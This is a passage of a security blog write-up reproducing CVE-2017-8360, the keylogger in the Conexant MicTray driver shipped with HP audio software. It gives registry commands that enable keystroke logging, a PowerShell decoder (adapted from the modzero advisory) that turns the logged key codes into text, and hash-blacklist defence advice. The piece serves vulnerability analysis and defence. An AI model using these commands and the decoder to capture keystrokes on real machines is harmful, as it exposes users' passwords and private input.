1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The configuration commands for the 64-bit program (MicTray64.exe) are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add hkcu\\SOFTWARE\\Conexant\\MicTray64.exe \u002Fv LogName \u002Ft REG_SZ \u002Fd \"C:\\test\\log.txt\"\u003Cbr>reg add hklm\\SOFTWARE\\Conexant\\MicTray\\Hotkey \u002Fv CustomSettings \u002Ft REG_DWORD \u002Fd 1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This tool implements keyboard logging by calling the WinAPI SetWindowsHookEx(). Compared to conventional keyboard logging programs, its advantage lies in containing a digital signature.\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018804052_4_23c64e9150-1.jpeg\">\u003C\u002Fp>\u003Ch3>3. Parsing keyboard logging content\u003C\u002Fh3>\u003Cp>The log file records the virtual key codes of the keyboard.\u003C\u002Fp>\u003Cp>A script can be used to convert virtual key codes into keyboard key names.\u003C\u002Fp>\u003Cp>Test PowerShell code from the reference link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.modzero.ch\u002Fadvisories\u002FMZ-17-01-Conexant-Keylogger.txt\u003C\u002Fp>\u003Cp>The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$filename = \"c:\\users\\public\\MicTray.log\"\u003Cbr>\u003Cbr>[System.IO.FileStream]   $fs = [System.IO.File]::Open(\u003Cbr>      $filename, \u003Cbr>      [System.IO.FileMode]::Open, \u003Cbr>      [System.IO.FileAccess]::Read, \u003Cbr>      [System.IO.FileShare]::ReadWrite)\u003Cbr>         \u003Cbr>[System.IO.StreamReader] $fr = [System.IO.StreamReader]::new(\u003Cbr>      $fs, \u003Cbr>      [Text.UTF8Encoding]::UNICODE)\u003Cbr>\u003Cbr>$el = 0\u003Cbr>\u003Cbr>while($el -lt 2) {\u003Cbr>   \u003Cbr>   $line = $fr.ReadLine()\u003Cbr>\u003Cbr>   # handle broken newlines in log...\u003Cbr>   if([string]::IsNullOrEmpty($line)) {\u003Cbr>      $el++\u003Cbr>   } else {\u003Cbr>      $el=0\u003Cbr>   }\u003Cbr>\u003Cbr>   $mc = [regex]::Match($line, \u003Cbr>         \"MicTray64.exe.*flags (0x0[A-Fa-f0-9]?).*vk (0x[A-Fa-f0-9]+)$\")\u003Cbr>   $r = $mc.Groups[2].Value\u003Cbr>\u003Cbr>   if(-Not [string]::IsNullOrEmpty($r)) {\u003Cbr>      $i = [convert]::ToInt32($r, 16)\u003Cbr>      $c = [convert]::ToChar($i)\u003Cbr>      \u003Cbr>      if($i -lt 0x20 -or $i -gt 0x7E) { $c = '.' }\u003Cbr>         \u003Cbr>      write-host -NoNewLine $(\"{0}\" -f $c)\u003Cbr>   }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>I encountered a code error during testing, as shown in the image below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018809859_5_ea78fb680b-1.jpeg\">\u003C\u002Fp>\u003Cp>Here is a simple solution, the code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$filename = \"c:\\users\\public\\MicTray.log\"\u003Cbr>$fr = Get-Content $filename\u003Cbr>foreach ($line in $fr)\u003Cbr>{\u003Cbr>   $mc = [regex]::Match($line, \u003Cbr>         \"MicTray64.exe.*flags (0x0[A-Fa-f0-9]?).*vk (0x[A-Fa-f0-9]+)$\")\u003Cbr>   $r = $mc.Groups[2].Value\u003Cbr>\u003Cbr>   if(-Not [string]::IsNullOrEmpty($r)) {\u003Cbr>      $i = [convert]::ToInt32($r, 16)\u003Cbr>      $c = [convert]::ToChar($i)\u003Cbr>      \u003Cbr>      if($i -lt 0x20 -or $i -gt 0x7E) { $c = '.' }\u003Cbr>         \u003Cbr>      write-host -NoNewLine $(\"{0}\" -f $c)\u003Cbr>   }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The converted output is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018815837_6_368947cf16-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x05 Defense Recommendations\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Add File Blacklist\u003C\u002Fp>\u003Cp>MicTray.exe:\u003C\u002Fp>\u003Cp>SHA256:\te882149c43976dfadb2746eb2d75a73f0be5aa193623b18b50827f43cce3ed84\u003C\u002Fp>\u003Cp>MicTray64.exe:\u003C\u002Fp>\u003Cp>SHA256:\tc046c7f364b42388bb392874129da555d9c688dced3ac1d6a1c6b01df29ea7a8\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Updating Windows patches does not prevent the program from running\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article reproduces the method of CVE-2017-8360 (Keylogger in HP Audio Driver), analyzes the exploitation approach, improves the test script, and provides defense recommendations.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1470,"Onedaysec",5,"published","2026-02-02T08:06:59.473Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"CVE-2017-8360 HP Audio Driver Keylogger Exploit Analysis","CVE-2017-8360, HP audio driver keylogger, Conexant keylogger exploit, MicTray.exe vulnerability, keylogger security analysis",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4],266,265,264,{"title":39,"description":39,"image":39},"2026-07-24T15:37:14.502Z","2026-07-23T16:01:17.728Z","draft","2026-07-23T16:04:53.880Z"]